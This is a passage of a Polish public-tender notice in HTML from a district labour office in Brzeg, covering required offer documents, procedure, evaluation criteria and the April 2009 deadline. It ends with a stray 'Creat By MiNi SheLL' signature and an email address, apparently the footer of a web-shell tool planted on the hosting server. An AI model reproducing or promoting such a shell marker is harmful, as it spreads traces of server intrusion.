3.Wzór zaświadczenia o ukończeniu szkolenia,
4.Wzór ankiety służącej do oceny szkolenia.


Postanowienia dotyczące składanych dokumentów:
1 Zgodnie z obowiązującym rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od Wykonawcy, oraz form, w jakich dokumenty mają być składane (Dz.U. nr 87 poz. 605). Dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę/osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
D. Na ofertę składają się następujące dokumenty i załączniki:
1.Formularz ofertowy - załącznik nr 3 do SIWZ.
2.Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne (załącznik nr 1 do oferty).
3. Oświadczenie o nie podleganiu z wykluczenia na podstawie art.24 ust.1 i 2 ustawy Pzp.(załącznik nr 2 do oferty).
4. Preliminarz kosztów (stanowiący załącznik nr 3, 3a i 3b do oferty).
5.Wykaz niezbędnych urządzeń i narzędzi jakimi dysponuje  Wykonawca (wg wzoru określonego w załączniku nr 4). 
5.Wykaz osób, które będą wykonywać zamówienie ( załącznik nr 5 do oferty).
6. Wykaz materiałów przeznaczonych do prowadzenia zajęć praktycznych (wg wzoru określonego w załączniku nr 6).
7. Aktualne zezwolenie na prowadzenie szkoleń kandydatów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Posiadane kwalifikacje kadry dydaktycznej - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.brzeg.sisco.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Armii Krajowej 32, 49 - 300 Brzeg, 
pokój numer 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Brzegu, ul. Armii Krajowej 32, 49-300 Brzeg, sekretariat- pokój nr 16 ( I piętro )..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com